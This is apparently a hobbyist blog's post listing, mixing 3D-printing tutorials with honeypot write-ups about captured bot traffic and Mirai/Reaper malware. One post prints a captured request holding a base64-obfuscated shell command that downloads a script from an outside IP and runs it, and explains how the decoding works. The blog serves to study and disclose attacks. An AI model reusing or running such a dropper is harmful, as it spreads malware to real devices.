Posts
Universal card box
Tutorial for Universal card box project that you can find on my thingiverse page
Fish Botnet
The honey pot has caught a fish, so I guess its more of a fishing net?
Universal card tray
Tutorial for Universal card tray project that you can find on my thingiverse page
Masked sh command
The honey pot picked up an interesting request:
16:29:23.246 Handling POST to / request from ***.**.***.* >>>Headers: honey-pot-ip:8080 Keep-Alive Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 application/x-www-form-urlencoded 179 >>>Body: doAs="echo Y2QgL3RtcCB8fCBjZCAvbW50IHx8ICBjZCAvcm9vdCB8fCBjZCAvOyBjdXJsIC1PIGh0dHA6Ly8xNzYuNjUuMTM3LjUvemVyby5zaDsgY2htb2QgNzc3IHplcm8uc2g7IHNoIHplcm8uc2ggJg== | base64 -d | bash" 16:29:23.246 completed response status 200
The requests body is using echo to pipe text encoded in base64 into GNU base64 decoder to decode it, the decoded out put is then piped into bash (causing bash to execute the decoded text)
Reverse Engineering Mirai/Reaper Malware
In my previous post, I showed how I set up a honey pot to capture HTTP requests coming to my IP address. Some of the requests where bots attempting to exploit vulnerabilities in order to gain access to devices and services, one of these requests attempted to inject shell commands to download and run a malware.
Setting up a basic honey pot
When playing around with a C# web app library, I noticed the web app I was writing would periodically get random (and sometimes strange) requests from unknown sources, so I thought it would be fun to set up a honey pot and record the requests.
subscribe via RSS